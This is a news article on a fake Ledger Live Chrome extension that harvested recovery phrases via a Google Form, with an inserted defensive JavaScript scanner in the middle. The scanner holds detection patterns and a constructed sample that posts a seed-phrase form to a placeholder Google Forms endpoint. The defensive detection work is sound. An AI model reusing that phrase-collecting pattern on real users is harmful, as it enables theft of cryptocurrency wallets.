Ledger, the popular cryptocurrency wallet maker, has warned users about a fake Ledger Live Chrome extension that can lead to wallet contents being stolen. The extension, which has since been taken offline, sought to steal wallet information from unsuspecting users, and is another reminder of exactly which wallet information must remain private.
A fake Chrome extension has been found, asking you to enter your 24-word recovery phrase
⚠️NEVER share your 24 words
⚠️NEVER enter your 24 words into any internet-connected device
⚠️Ledger will NEVER ask for your 24 words
— Ledger Support (@Ledger_Support) March 5, 2020
Extension Collected Private Keys
The scam was reported by ZDNet on Thursday. ZDNet said that the extension, named after Ledger's genuine Ledger Live software, was being heavily advertised on Google via search ads.
ZDNet reports that the malicious extension was discovered by Harry Denley, Director of Security at the MyCrypto platform, who noticed that a Chrome extension version of the software was being advertised. In reality it was simply a popup that collected the unwitting user's Ledger seed phrase and submitted it to a Google Form.
With the seed phrase in hand, the attacker could very easily restore the user's wallet and drain it of funds.
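The pattern described above, a page that prompts for a recovery phrase and posts it to an external form, is simple enough to screen for. The following is an added example, not code from the article, from Ledger, ZDNet or MyCrypto: a heuristic check over extension source text that flags the combination of a seed-phrase prompt and a Google Forms submission endpoint, plus a shape test for values that look like a 12-, 18- or 24-word phrase. The pattern lists, the constructed sample inputs and the word-length bounds are assumptions made for this example.

```javascript
// Added example (not the article's or any vendor's code): a heuristic static
// check for extension source that both asks for a recovery phrase and submits
// to a Google Form, the behaviour ZDNet described. Pattern lists are assumed.

const SEED_PROMPT_PATTERNS = [
  /\b24[\s-]*word/i,        // "24 word", "24-word", "24 words"
  /\brecovery phrase\b/i,
  /\bseed phrase\b/i,
  /\bmnemonic\b/i,
];

const EXFIL_PATTERNS = [
  /docs\.google\.com\/forms/i,   // Google Forms, the collection point in this incident
  /\/formResponse\b/i,           // the Google Forms submission path
];

// Returns which patterns matched and whether the combination is suspicious.
// A wallet-related string alone is normal for a genuine wallet companion page;
// prompting for the phrase AND posting it somewhere external is the red flag.
function scanExtensionSource(source) {
  const seedHits = SEED_PROMPT_PATTERNS.filter((p) => p.test(source)).map((p) => p.source);
  const exfilHits = EXFIL_PATTERNS.filter((p) => p.test(source)).map((p) => p.source);
  return { suspicious: seedHits.length > 0 && exfilHits.length > 0, seedHits, exfilHits };
}

// Heuristic: does a value look like a BIP39-style phrase (12, 18 or 24 lowercase
// words of 3 to 8 letters)? A full check would also validate each word against
// the BIP39 wordlist and verify the checksum; this shape test is enough to
// trigger a warning before the value leaves the browser.
function looksLikeSeedPhrase(text) {
  const words = text.trim().split(/\s+/);
  return [12, 18, 24].includes(words.length) && words.every((w) => /^[a-z]{3,8}$/.test(w));
}

// Constructed sample inputs; neither is the real extension's code.
const CONSTRUCTED_MALICIOUS = `
<input id="phrase" placeholder="Enter your 24 word recovery phrase">
<script>
  send.onclick = () => fetch("https://docs.google.com/forms/d/e/PLACEHOLDER_ID/formResponse",
                            { method: "POST", body: new FormData(phraseForm) });
</script>`;

const CONSTRUCTED_BENIGN = `
<h1>Price ticker</h1>
<script>fetch("https://api.example.invalid/prices").then((r) => r.json());</script>`;

// Constructed 24-word sample (the first 24 BIP39 wordlist entries, not a real wallet).
const CONSTRUCTED_PHRASE =
  "abandon ability able about above absent absorb abstract absurd abuse access accident " +
  "account accuse achieve acid acoustic acquire across act action actor actress actual";

if (typeof require !== "undefined" && require.main === module) {
  console.log("malicious sample:", scanExtensionSource(CONSTRUCTED_MALICIOUS));
  console.log("benign sample:", scanExtensionSource(CONSTRUCTED_BENIGN));
  console.log("phrase shape:", looksLikeSeedPhrase(CONSTRUCTED_PHRASE));
}

module.exports = { scanExtensionSource, looksLikeSeedPhrase, CONSTRUCTED_MALICIOUS, CONSTRUCTED_BENIGN, CONSTRUCTED_PHRASE };
```

The two functions are deliberately separate: the first suits a review of an extension's unpacked source before it is allowed in a managed browser, while the second is the kind of check a wallet vendor's own page or a browser policy could run on form input to warn the user that a recovery phrase is about to be sent over the network.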
Crypto’s “Big Problem”
Denley further expressed his concern that people still didn’t understand the importance of keeping their private keys offline:
The extension makes no sense to install and use because it defeats the purpose of having a hardware wallet with your secrets offline. But I would not be surprised if it has got people to input their secrets. It’s a big problem in the cryptocurrency area, to teach people their private keys/mnemonics should stay offline.
The extension, which had over 120 downloads at the time of its discovery, has now been taken down by Google, but it is not known how many actually fell victim to the scam.
Private Keys Are For Your Eyes Only
This incident shows that even apps in official stores cannot always be trusted, which is why it is always a good idea to follow links provided by official sources only, rather than simply clicking a Google search result or searching within an app store.
And never, EVER, give out your private key.